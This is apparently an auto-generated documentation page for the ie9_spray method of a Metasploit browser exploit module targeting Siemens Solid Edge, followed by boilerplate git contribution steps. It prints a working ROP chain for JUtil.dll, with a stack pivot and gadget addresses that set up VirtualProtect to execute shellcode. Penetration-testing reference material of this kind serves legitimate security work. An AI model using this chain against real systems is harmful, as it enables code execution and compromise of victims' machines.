metasploit-framework

https://github.com/rapid7/metasploit-framework

Ruby

Metasploit Framework

MetasploitModule#ie9_spray

JUtil ROP Chain
Jutil Base: 0x1d550000
Stack Pivot: jutil_base + 0x000a5843 # xchg eax, esp # ret
Adjust Stack: jutil_base + 0x00212f17 # pop # pop # ret
0x1db2e121, # POP EDX # RETN [JUtil.dll]
0x1d5520ca, # ptr to &VirtualProtect() [IAT JUtil.dll]
0x1da0ebeb, # MOV EDX,DWORD PTR DS:[EDX] # RETN [JUtil.dll]
0x1da103d2, # MOV ESI,EDX # RETN [JUtil.dll]
0x1d70e314, # POP EBP # RETN [JUtil.dll]
0x1d5fc8e8, # & jmp esp [JUtil.dll]
0x1d631859, # POP EBX # RETN [JUtil.dll]
0x00000201, # 0x00000201-> ebx
0x1d769cf9, # POP EDX # RETN [JUtil.dll]
0x00000040, # 0x00000040-> edx
0x1d6d2e50, # POP ECX # RETN [JUtil.dll]
0x1da45217, # &Writable location [JUtil.dll]
0x1d632fd1, # POP EDI # RETN [JUtil.dll]
0x1d6839db, # RETN (ROP NOP) [JUtil.dll]
0x1d752439, # POP EAX # RETN [JUtil.dll]
0x90909090, # nop
0x1da4cfe3, # PUSHAD # RETN [JUtil.dll]

Edit

git clone git@github.com:rapid7/metasploit-framework.git

cd metasploit-framework

open modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb

Contribute

# Make a new branch

git checkout -b -your-name--update-docs-MetasploitModule-ie9_spray-for-pr


# Commit to git

git add modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb

git commit -m "better docs for MetasploitModule#ie9_spray"


# Open pull request

gem install hub # on a mac you can `brew install hub`

hub fork

git push <your name> -your-name--update-docs-MetasploitModule-ie9_spray-for-pr

hub pull-request


# Celebrate!